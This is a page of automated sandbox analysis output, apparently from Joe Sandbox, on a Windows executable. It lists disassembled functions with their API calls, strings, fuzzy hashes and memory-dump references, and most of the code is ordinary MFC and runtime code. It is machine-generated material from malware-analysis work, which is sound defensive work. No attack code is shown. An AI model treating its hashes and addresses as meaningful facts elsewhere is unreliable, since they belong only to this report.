Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: 520a8f9fff23edb11df75c9b40800e034cb57673114b8a87f58f0e904a9409c8
Instruction ID: cea5fa90b90f6231575ada4759ac3cf8c57247561b1108399e47097ef67c9ea0
Opcode Fuzzy Hash: 520a8f9fff23edb11df75c9b40800e034cb57673114b8a87f58f0e904a9409c8
Instruction Fuzzy Hash: 4911C2B2D012596ECB00FBA0E491AEE7B68AF04308F44806BF819A7242D63C5949C76D

Function 00437876 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043787B
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 004378AE
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 004378D4

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

Part of subcall function 0043537A: DeleteFileA.KERNEL32(?), ref: 0043537E
Part of subcall function 0043537A: GetLastError.KERNEL32(00000000), ref: 00435389

Strings

MFC, xrefs: 004378CE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: eeefc77ef8c6f97ae2608ccc78bb42a4e6e26e380097b6d0c00cbe7baa6e88ab
Instruction ID: 9be3974ee7dcc180dece0cadfeb9fb4fa38b58a9d56bef045ab7b7733124b71f
Opcode Fuzzy Hash: eeefc77ef8c6f97ae2608ccc78bb42a4e6e26e380097b6d0c00cbe7baa6e88ab
Instruction Fuzzy Hash: F4118FB2900219EFCF00EFA4DC819EEB778FF04354F40402AF925A7191DB749A48CBA4

Function 004353DA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004353DF

Part of subcall function 00435477: wsprintfA.USER32 ref: 004354C7

Part of subcall function 004354E6: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 00435507
Part of subcall function 004354E6: RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0043551B
Part of subcall function 004354E6: RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 00435536
Part of subcall function 004354E6: RegQueryValueExA.ADVAPI32(?,0046B4B8,00000000,?,00000000,?,00000104), ref: 0043555F
Part of subcall function 004354E6: RegCloseKey.ADVAPI32(?,000000FF), ref: 0043557D
Part of subcall function 004354E6: RegCloseKey.ADVAPI32(00000001), ref: 00435582
Part of subcall function 004354E6: RegCloseKey.ADVAPI32(?), ref: 00435587

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,004353B1,?,0045C7C0,00000000), ref: 00435422
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 00435432

Strings

DllGetClassObject, xrefs: 0043542C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
String ID: DllGetClassObject
API String ID: 821125782-1075368562
Opcode ID: 2f5b897bddd505fa4edb31a0639c59bc4b76d217c801762fdbb194856c6fc3c8
Instruction ID: 3034f5309fca038fc901d22a3b6acc401eef4a6a1807da565f9ea98d5a2c1294
Opcode Fuzzy Hash: 2f5b897bddd505fa4edb31a0639c59bc4b76d217c801762fdbb194856c6fc3c8
Instruction Fuzzy Hash: 7B11C17191062AEBCF159F50CC00BAE7775AF1434AF10442AF821A21A1D7789A64DBA9

Function 004224D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 004224FB
InterlockedDecrement.KERNEL32(0046EEE8), ref: 00422510

Strings

F, xrefs: 004224F4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$DecrementIncrement
String ID: F
API String ID: 2172605799-3850746006
Opcode ID: 5d8ef691ee8dfedea1c6ccb81078239d3183dc7d8460fae8220c34ad52f62302
Instruction ID: 3bca415d9bf4402314861e0b57c21d05937ec4c567c42ac515ef8dc1c1346b18
Opcode Fuzzy Hash: 5d8ef691ee8dfedea1c6ccb81078239d3183dc7d8460fae8220c34ad52f62302
Instruction Fuzzy Hash: 02F02232601731BBD320AF56BD9199BA785FB9031AF94443FF000C5161C7E89AC1D95E

Function 00422D34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 00422D5A
InterlockedDecrement.KERNEL32(0046EEE8), ref: 00422D6F

Strings

F, xrefs: 00422D53

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$DecrementIncrement
String ID: F
API String ID: 2172605799-3850746006
Opcode ID: cd7edc1d2bb5281fc13602d3792853d187038b179b02479242f82cccfdbf4ce7
Instruction ID: 9830917a3010862ebfd02918fc2959b4db811703d1997396db7db0d1be58020e
Opcode Fuzzy Hash: cd7edc1d2bb5281fc13602d3792853d187038b179b02479242f82cccfdbf4ce7
Instruction Fuzzy Hash: 6FF0C232711322BBE320AF96BD81A9BA795FF90716F94043FF40485161D7E8C981891E

Function 00448181 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5A6
Part of subcall function 0044B56B: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5B8
Part of subcall function 0044B56B: LeaveCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5C1
Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A), ref: 0044B5D3

CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
CreatePatternBrush.GDI32(00000000), ref: 004481CD
DeleteObject.GDI32(00000000), ref: 004481D9

Strings

5!D, xrefs: 0044819A, 004481B4, 004481B7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
String ID: 5!D
API String ID: 3767330792-550465027
Opcode ID: 9ad69d31128bbfa82dd4b0e2b817d25f44f4e478a9fa2de729bd61a15917bba5
Instruction ID: 9c2335d3ac1647ac1722f80fa25989d35d65ac4a73b2c60fd1cb5489864e98a2
Opcode Fuzzy Hash: 9ad69d31128bbfa82dd4b0e2b817d25f44f4e478a9fa2de729bd61a15917bba5
Instruction Fuzzy Hash: A0F0C871A40F0066F750A7698C56B6E72A6EBC4B06F10403FFA46962E1EEB48446875E

Function 00427E79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 00427E85
InterlockedDecrement.KERNEL32(0046EEE8), ref: 00427E9C

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

InterlockedDecrement.KERNEL32(0046EEE8), ref: 00427ED2

Strings

F, xrefs: 00427E7E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
String ID: F
API String ID: 2038102319-3850746006
Opcode ID: ae15ffcc7536962dc3b86d45ce3fe6b552d91fcf8ca211ba40e3e5ea9589929c
Instruction ID: 970d7fc65aa109e8fdc09109daa8e957066517058422fe6c031ef7b9cfc5c227
Opcode Fuzzy Hash: ae15ffcc7536962dc3b86d45ce3fe6b552d91fcf8ca211ba40e3e5ea9589929c
Instruction Fuzzy Hash: 09F0C23620021EBFEF016F92EC419DF3B59EF54365F05003BFA0445121D6B68D6296E9

Function 00422AA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 00422AB1
InterlockedDecrement.KERNEL32(0046EEE8), ref: 00422AC8

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

InterlockedDecrement.KERNEL32(0046EEE8), ref: 00422AF4

Strings

F, xrefs: 00422AAA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
String ID: F
API String ID: 2038102319-3850746006
Opcode ID: 5e1347481e0dfc0a1753907e4919bdac2eadb145cd30492c673df6052558f20f
Instruction ID: c728ecd13c60655e3f0693d3edbdb0e91b2090bb824eaa0325c0afe6fb21c736
Opcode Fuzzy Hash: 5e1347481e0dfc0a1753907e4919bdac2eadb145cd30492c673df6052558f20f
Instruction Fuzzy Hash: 31F05936201219BEE720AF96FC409DA7788FF44739B00403FF908490519EFA8A42855D

Function 004233EC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 004233F8
InterlockedDecrement.KERNEL32(0046EEE8), ref: 0042340F

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

InterlockedDecrement.KERNEL32(0046EEE8), ref: 0042343F

Strings

F, xrefs: 004233F1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
String ID: F
API String ID: 2038102319-3850746006
Opcode ID: 6091703ddf7c32774fd9ea7ea23be3c6550ba6a069f646f03dec80a4a168d01a
Instruction ID: dd98dc6b0093032f7c155d8289a83e1a6400ab809baf0bd139c8bfa1cdd16f12
Opcode Fuzzy Hash: 6091703ddf7c32774fd9ea7ea23be3c6550ba6a069f646f03dec80a4a168d01a
Instruction Fuzzy Hash: 25F02432200329BFDB017F92AC419EB3BA8FF4072AF04003BFA0405111DBB98A52869E

Function 00449F62 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 00449F79
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00449F85

Strings

DllGetVersion, xrefs: 00449F7F
COMCTL32.DLL, xrefs: 00449F74

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: fe87c20e5e2832ee16b4a3f7c88ecdefa8713556c90dd01ae5f9b63b4903c82b
Instruction ID: bfd7dd0c877008c9689f88eeff68b9c6dd90b9b58361fbedae9390ec18d31dea
Opcode Fuzzy Hash: fe87c20e5e2832ee16b4a3f7c88ecdefa8713556c90dd01ae5f9b63b4903c82b
Instruction Fuzzy Hash: 7BF0A4B1E0032867E7009BE99C4579B77A89B04755F500032FA14F32D1E6B4CC0492B9

Function 00438FB8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 00438FC9
GetClassNameA.USER32(00000000,?,0000000A), ref: 00438FE4
lstrcmpiA.KERNEL32(?,combobox), ref: 00438FF3

Strings

combobox, xrefs: 00438FED

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: 9314dab307f551f952438a4a447ed22b279cecb635e5b6151a273a6d2eb5e276
Instruction ID: 5b2a7f491a015e406fb79cf3548407de58b519558d09b109b7665fe2429e34ba
Opcode Fuzzy Hash: 9314dab307f551f952438a4a447ed22b279cecb635e5b6151a273a6d2eb5e276
Instruction Fuzzy Hash: 99E0E531504308FFCF005F60CC0AAAA7769A700306F104221F916D90E5DA78D149CB49

Function 0041F3D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0041A989), ref: 0041F3D5
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0041F3E5

Strings

IsProcessorFeaturePresent, xrefs: 0041F3DF
KERNEL32, xrefs: 0041F3D0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 50df73dc5ed471ab1bf28f5a293f57011f98b91cb940cd24b2104f426fb7d6f0
Instruction ID: 15ca4511348fbda3b1f2584f57fc0c0da809ec7ae51bb4dc4468967733c88aa8
Opcode Fuzzy Hash: 50df73dc5ed471ab1bf28f5a293f57011f98b91cb940cd24b2104f426fb7d6f0
Instruction Fuzzy Hash: 78C01270344705A6D9101BB08C19B6621185B40F47F2404367C29D0481EE98C489D12E

Function 00435CB6 Relevance: 6.3, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00000000,00000000,00000104), ref: 00435CFA
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00435D10
lstrcmpiA.KERNEL32(?,00000000), ref: 00435D32
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 00435D61

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: lstrcmpilstrcpylstrcpynlstrlen
String ID:
API String ID: 4224384254-0
Opcode ID: acf833916d90dc3d04bef03e3d88a33a963ad6a0d8a0e6514dc236d9e6ac4f09
Instruction ID: bcd5136182b46b12e695adac7d6f1f013c2f6ef188c670b388d9537249610876
Opcode Fuzzy Hash: acf833916d90dc3d04bef03e3d88a33a963ad6a0d8a0e6514dc236d9e6ac4f09
Instruction Fuzzy Hash: 80318B72500208EFDB20DFA8DC88EEA7BB8EF48355F10416AF945DB291D674DE81CB64

Function 025021A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 025021F9
SetLastError.KERNEL32(0000007E), ref: 0250223B

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: e06df4b4ab439e5e43325103e00a4b868dc09e44d0e041412f750c2030000aa5
Instruction ID: dda0de6b6db0c9997a608985bcc876b95bf7b7f3be76dc2d4696dfa630dd6328
Opcode Fuzzy Hash: e06df4b4ab439e5e43325103e00a4b868dc09e44d0e041412f750c2030000aa5
Instruction Fuzzy Hash: 4F81AA74A10209EFDB04CF94C994BADBBB1FF48314F248598E909AB395C734EA85CF95

Function 0041661F Relevance: 6.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416624
VariantClear.OLEAUT32(?), ref: 004166D6
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 00416773
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 00416781

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: 81f84ba33689ca8f89516fff8096abfed328ac1d8b366d1c5bcc45838fe86247
Instruction ID: 3a5c793ba7e1dea9509bffedb40281f43695c47c9d61fe368a748f616d5c76ba
Opcode Fuzzy Hash: 81f84ba33689ca8f89516fff8096abfed328ac1d8b366d1c5bcc45838fe86247
Instruction Fuzzy Hash: A2615631600601DFCB20DFA5C9C49AAB7F6FF48308755086EE5569BB62CB38EC85CB58

Function 00424893 Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000), ref: 0042490D
GetLastError.KERNEL32 ref: 00424917
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 004249DD
GetLastError.KERNEL32 ref: 004249E7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: bb18dec0b8dad3dbb8f2eb1b810e8b58048961c04948ecdc6ea59c863972a97d
Instruction ID: 0596580b34c82b0639b8115038123964b10ed24fec1e9c1252288532181ca8b5
Opcode Fuzzy Hash: bb18dec0b8dad3dbb8f2eb1b810e8b58048961c04948ecdc6ea59c863972a97d
Instruction Fuzzy Hash: 5751E7757043A59FDF218F68E8407AA7BB0EF86304F94409BE85597352D3789982CB1D

Function 0041695A Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00416978
GetDesktopWindow.USER32 ref: 0041698B
GetWindowRect.USER32(?,?), ref: 0041699E
GetWindowRect.USER32(?,?), ref: 004169AB

Part of subcall function 00433883: MoveWindow.USER32(?,?,?,00000000,?,?,?,00416AEC,?,?,?,?,00000000), ref: 0043389F

